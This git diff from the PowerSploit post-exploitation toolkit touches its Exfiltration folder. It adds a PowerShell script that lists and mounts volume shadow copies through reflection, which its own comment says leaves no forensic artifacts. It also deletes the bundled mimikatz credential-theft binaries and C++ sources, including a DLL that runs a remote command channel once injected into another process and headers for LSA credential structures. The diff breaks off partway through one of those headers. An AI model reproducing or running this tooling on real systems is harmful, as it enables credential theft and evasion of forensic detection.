\ No newline at end of file +} diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1 index c14c723..e1ca823 100644 --- a/Exfiltration/Get-TimedScreenshot.ps1 +++ b/Exfiltration/Get-TimedScreenshot.ps1 @@ -1,4 +1,4 @@ -function Get-TimedScreenshot
+function Get-TimedScreenshot
{
<#
.SYNOPSIS
diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index ef96260..adce579 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ b/Exfiltration/Invoke-Mimikatz.ps1 @@ -2710,4 +2710,4 @@ Function Main } Main -}
\ No newline at end of file +} diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index cfa763f..7ff5bfa 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -2845,4 +2845,4 @@ Main [GC]::Collect() [GC]::Collect() -}
\ No newline at end of file +} diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index e904cdb..8c8b7b4 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -1,4 +1,4 @@ -function Invoke-TokenManipulation +function Invoke-TokenManipulation { <# .SYNOPSIS diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1 index afb7dc9..a43ee0f 100644 --- a/Exfiltration/Out-Minidump.ps1 +++ b/Exfiltration/Out-Minidump.ps1 @@ -1,4 +1,4 @@ -function Out-Minidump +function Out-Minidump { <# .SYNOPSIS @@ -127,4 +127,4 @@ } END {} -}
\ No newline at end of file +} diff --git a/Exfiltration/VolumeShadowCopyTools.ps1 b/Exfiltration/VolumeShadowCopyTools.ps1 new file mode 100644 index 0000000..e8c28a1 --- /dev/null +++ b/Exfiltration/VolumeShadowCopyTools.ps1 @@ -0,0 +1,147 @@ +function Get-VolumeShadowCopy +{ +<# +.SYNOPSIS + + Lists the device paths of all local volume shadow copies. + + PowerSploit Function: Get-VolumeShadowCopy + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + Version: 2.0.0 +#> + + $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) + + if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')) + { + Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.' + } + + Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.DeviceObject } +} + +function Mount-VolumeShadowCopy +{ +<# +.SYNOPSIS + + Mounts a volume shadow copy. + + PowerSploit Function: Mount-VolumeShadowCopy + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + Version: 2.0.0 + +.DESCRIPTION + + Mount-VolumeShadowCopy mounts a volume shadow copy volume by creating a symbolic link. + +.PARAMETER Path + + Specifies the path to which the symbolic link for the mounted volume shadow copy will be saved. + +.PARAMETER DevicePath + + Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object. + +.EXAMPLE + + Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS + + Description + ----------- + Create a mount point in 'C:\VSS' for each volume shadow copy volume + +.EXAMPLE + + Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4' + +.EXAMPLE + + Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS -DevicePath $_ } +#> + + Param ( + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Path, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True)] + [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')] + [String[]] + $DevicePath + ) + + BEGIN + { + $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) + + if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')) + { + Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.' + } + + # Validate that the path exists before proceeding + Get-ChildItem $Path -ErrorAction Stop | Out-Null + + $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False) + + # Define [VSS.Kernel32]::CreateSymbolicLink method using reflection + # (i.e. none of the forensic artifacts left with using Add-Type) + $TypeBuilder = $ModuleBuilder.DefineType('VSS.Kernel32', 'Public, Class') + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateSymbolicLink', + 'kernel32.dll', + ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), + [Reflection.CallingConventions]::Standard, + [Bool], + [Type[]]@([String], [String], [UInt32]), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) + $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') + $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, + @('kernel32.dll'), + [Reflection.FieldInfo[]]@($SetLastError), + @($true)) + $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) + + $Kernel32Type = $TypeBuilder.CreateType() + } + + PROCESS + { + foreach ($Volume in $DevicePath) + { + $Volume -match '^\\\\\?\\GLOBALROOT\\Device\\(?<LinkName>HarddiskVolumeShadowCopy[0-9]{1,3})$' | Out-Null + + $LinkPath = Join-Path $Path $Matches.LinkName + + if (Test-Path $LinkPath) + { + Write-Warning "'$LinkPath' already exists." + continue + } + + if (-not $Kernel32Type::CreateSymbolicLink($LinkPath, "$($Volume)\", 1)) + { + Write-Error "Symbolic link creation failed for '$Volume'." + continue + } + + Get-Item $LinkPath + } + } + + END + { + + } +}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/Win32/kappfree.dll b/Exfiltration/mimikatz-1.0/Win32/kappfree.dll Binary files differdeleted file mode 100644 index 83b3a43..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kappfree.dll +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/kappfree.exp b/Exfiltration/mimikatz-1.0/Win32/kappfree.exp Binary files differdeleted file mode 100644 index a6fb957..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kappfree.exp +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/kappfree.lib b/Exfiltration/mimikatz-1.0/Win32/kappfree.lib Binary files differdeleted file mode 100644 index 0f5d047..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kappfree.lib +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/kelloworld.dll b/Exfiltration/mimikatz-1.0/Win32/kelloworld.dll Binary files differdeleted file mode 100644 index ea6081a..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kelloworld.dll +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/kelloworld.exp b/Exfiltration/mimikatz-1.0/Win32/kelloworld.exp Binary files differdeleted file mode 100644 index ce21b16..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kelloworld.exp +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/kelloworld.lib b/Exfiltration/mimikatz-1.0/Win32/kelloworld.lib Binary files differdeleted file mode 100644 index 5328cbd..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/kelloworld.lib +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/klock.dll b/Exfiltration/mimikatz-1.0/Win32/klock.dll Binary files differdeleted file mode 100644 index d78b442..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/klock.dll +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/klock.exp b/Exfiltration/mimikatz-1.0/Win32/klock.exp Binary files differdeleted file mode 100644 index 947406f..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/klock.exp +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/klock.lib b/Exfiltration/mimikatz-1.0/Win32/klock.lib Binary files differdeleted file mode 100644 index 40c5c8d..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/klock.lib +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/mimikatz.dll b/Exfiltration/mimikatz-1.0/Win32/mimikatz.dll Binary files differdeleted file mode 100644 index 028d15a..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/mimikatz.dll +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/mimikatz.exe b/Exfiltration/mimikatz-1.0/Win32/mimikatz.exe Binary files differdeleted file mode 100644 index d92b2f7..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/mimikatz.exe +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/mimikatz.exp b/Exfiltration/mimikatz-1.0/Win32/mimikatz.exp Binary files differdeleted file mode 100644 index 0de4a90..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/mimikatz.exp +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/mimikatz.lib b/Exfiltration/mimikatz-1.0/Win32/mimikatz.lib Binary files differdeleted file mode 100644 index b98eea9..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/mimikatz.lib +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.dll b/Exfiltration/mimikatz-1.0/Win32/sekurlsa.dll Binary files differdeleted file mode 100644 index 0cb9638..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.dll +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.exp b/Exfiltration/mimikatz-1.0/Win32/sekurlsa.exp Binary files differdeleted file mode 100644 index a7fd6eb..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.exp +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.lib b/Exfiltration/mimikatz-1.0/Win32/sekurlsa.lib Binary files differdeleted file mode 100644 index cdcf2b5..0000000 --- a/Exfiltration/mimikatz-1.0/Win32/sekurlsa.lib +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/globdefs.h b/Exfiltration/mimikatz-1.0/commun/globdefs.h deleted file mode 100644 index d579a3b..0000000 --- a/Exfiltration/mimikatz-1.0/commun/globdefs.h +++ /dev/null @@ -1,128 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#pragma warning(disable:4530) -#include <stdio.h> -#include <windows.h> -#include <ntsecapi.h> -#include <string> -#include <vector> -using namespace std; - -#define SECURITY_WIN32 -#define PAGE_SIZE 0x1000 -#define MAX_DOMAIN_LEN 24 -#define MAX_USERNAME_LEN 24 - -#define MIMIKATZ L"mimikatz" -#ifdef _M_X64 - #define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)" -#else ifdef - #define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)" -#endif - -#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) -#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1) -#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2) -#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3) - -#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) -#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) -#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L) - -#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;} - -typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments); - -typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND { - PKIWI_LOCAL_COMMAND ptrCommand; - wstring commandName; - wstring commandHelp; - _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {} - _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {} -} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND; - -typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE { - wstring module; - wstring description; - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes; - _KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {} -} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE; - -typedef struct _CLIENT_ID { - PVOID UniqueProcess; - PVOID UniqueThread; -} CLIENT_ID, *PCLIENT_ID; - -typedef const ULONG CLONG; -typedef const UNICODE_STRING *PCUNICODE_STRING; -typedef STRING OEM_STRING; -typedef PSTRING POEM_STRING; -typedef CONST STRING* PCOEM_STRING; - -/* System* */ -typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]); -typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]); -typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]); -typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]); -/* CNG */ -typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput); -typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject); -typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer); -typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer); - -typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags); -typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags); -typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags); -typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags); -typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey); -typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags); - -/* Rtl* */ -#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart)) -typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId); -typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString); -typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString); -typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString); -typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString); -typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer); -typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct); -typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize); -typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer); - -typedef struct _RTL_BALANCED_LINKS { - struct _RTL_BALANCED_LINKS *Parent; - struct _RTL_BALANCED_LINKS *LeftChild; - struct _RTL_BALANCED_LINKS *RightChild; - CHAR Balance; - UCHAR Reserved[3]; -} RTL_BALANCED_LINKS; -typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS; - -typedef enum _RTL_GENERIC_COMPARE_RESULTS { - GenericLessThan, - GenericGreaterThan, - GenericEqual -} RTL_GENERIC_COMPARE_RESULTS; - -typedef struct _RTL_AVL_TABLE { - RTL_BALANCED_LINKS BalancedRoot; - PVOID OrderedPointer; - ULONG WhichOrderedElement; - ULONG NumberGenericTableElements; - ULONG DepthOfTree; - PRTL_BALANCED_LINKS RestartKey; - ULONG DeleteCount; - PRTL_AVL_COMPARE_ROUTINE CompareRoutine; - PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine; - PRTL_AVL_FREE_ROUTINE FreeRoutine; - PVOID TableContext; -} RTL_AVL_TABLE, *PRTL_AVL_TABLE; diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico Binary files differdeleted file mode 100644 index 9ac92da..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico Binary files differdeleted file mode 100644 index 79edffc..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico Binary files differdeleted file mode 100644 index 2285d1c..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico Binary files differdeleted file mode 100644 index 745963e..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico Binary files differdeleted file mode 100644 index 7497143..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico Binary files differdeleted file mode 100644 index 07df30f..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico Binary files differdeleted file mode 100644 index 67b1100..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico Binary files differdeleted file mode 100644 index 6d7f787..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico Binary files differdeleted file mode 100644 index 805707a..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico Binary files differdeleted file mode 100644 index a1c08e5..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico Binary files differdeleted file mode 100644 index ea38a48..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico Binary files differdeleted file mode 100644 index 27adde3..0000000 --- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp deleted file mode 100644 index a87ea8f..0000000 --- a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp +++ /dev/null @@ -1,139 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kmodel.h" - -HMODULE g_hModule = NULL; - -BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) -{ - if (ul_reason_for_call == DLL_PROCESS_ATTACH) - { - g_hModule = hModule; - - HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL); - if(hThread && hThread != INVALID_HANDLE_VALUE) - { - return CloseHandle(hThread); - } - } - return TRUE; -} - -DWORD WINAPI ThreadProc(LPVOID lpParameter) -{ - mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz"); - - bool succes = false; - for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++) - { - succes = monCommunicator->createClient(); - if(!succes) - { - Sleep(3000); - } - } - - if(succes) - { - ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription")); - - wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi"; - if(maFonctionString) - { - wstring * maDescription = new wstring(); - if(maFonctionString(maDescription)) - { - monBuffer.append(L"\n\n"); - monBuffer.append(*maDescription); - } - delete maDescription; - } - - - - if(monCommunicator->writeToPipe(monBuffer)) - { - for(;;) - { - if(monCommunicator->readFromPipe(monBuffer)) - { - wstring fonction = monBuffer; - vector<wstring> arguments; - - size_t monIndex = fonction.find(L' '); - - if(monIndex != wstring::npos) - { - arguments = mod_parseur::parse(fonction.substr(monIndex + 1)); - fonction = fonction.substr(0, monIndex); - } - - string procDll(fonction.begin(), fonction.end()); - - ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str())); - - if(maFonction) - { - if(maFonction(monCommunicator, &arguments)) - { - monBuffer = L"@"; - } - else // La fonction retourn FALSE, il y a donc anomalie bloquante sur le canal - { - break; - } - } - else - { - monBuffer = L"@Mthode \'"; - monBuffer.append(fonction); - monBuffer.append(L"\' introuvable !\n"); - } - - if(!monCommunicator->writeToPipe(monBuffer)) - { - break; - } - } - else - { - break; - } - } - } - } - - delete monCommunicator; - - FreeLibraryAndExitThread(g_hModule, 0); - return 0; -} - -bool sendTo(mod_pipe * monPipe, wstring message) -{ - wstring reponse = L"#"; - reponse.append(message); - - return monPipe->writeToPipe(reponse); -} - - -__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - bool sendOk = sendTo(monPipe, L"pong"); - - for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++) - { - wstring maReponse = L" - argument:"; - maReponse.append(*monArgument); - sendOk = sendTo(monPipe, maReponse); - } - - if(sendOk) - sendOk = sendTo(monPipe, L"\n"); - - return sendOk; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.h b/Exfiltration/mimikatz-1.0/commun/kmodel.h deleted file mode 100644 index 65bd912..0000000 --- a/Exfiltration/mimikatz-1.0/commun/kmodel.h +++ /dev/null @@ -1,21 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_pipe.h" -#include "mod_parseur.h" - -#define __kextdll extern "C" __declspec(dllexport) - -typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments); -typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription); - -BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved); -DWORD WINAPI ThreadProc(LPVOID lpParameter); - -bool sendTo(mod_pipe * monPipe, wstring message); - -__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments); diff --git a/Exfiltration/mimikatz-1.0/commun/secpkg.h b/Exfiltration/mimikatz-1.0/commun/secpkg.h deleted file mode 100644 index 385307d..0000000 --- a/Exfiltration/mimikatz-1.0/commun/secpkg.h +++ /dev/null @@ -1,239 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <sspi.h> -#include <wincred.h> - -typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL -{ - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING Domaine; - LSA_UNICODE_STRING Password; -} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL; - -typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) (); - -typedef PVOID *PLSA_CLIENT_REQUEST; -typedef LPTHREAD_START_ROUTINE SEC_THREAD_START; -typedef LPSECURITY_ATTRIBUTES SEC_ATTRS; - -typedef struct _SECPKG_CLIENT_INFO { - LUID LogonId; // Effective Logon Id - ULONG ProcessID; // Process Id of caller - ULONG ThreadID; // Thread Id of caller - BOOLEAN HasTcbPrivilege; // Client has TCB - BOOLEAN Impersonating; // Client is impersonating - BOOLEAN Restricted; // Client is restricted - // NT 5.1 - UCHAR ClientFlags; // Extra flags about the client - SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client - // NT 6 - HANDLE ClientToken; -} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO; - -typedef enum _LSA_TOKEN_INFORMATION_TYPE { - LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data 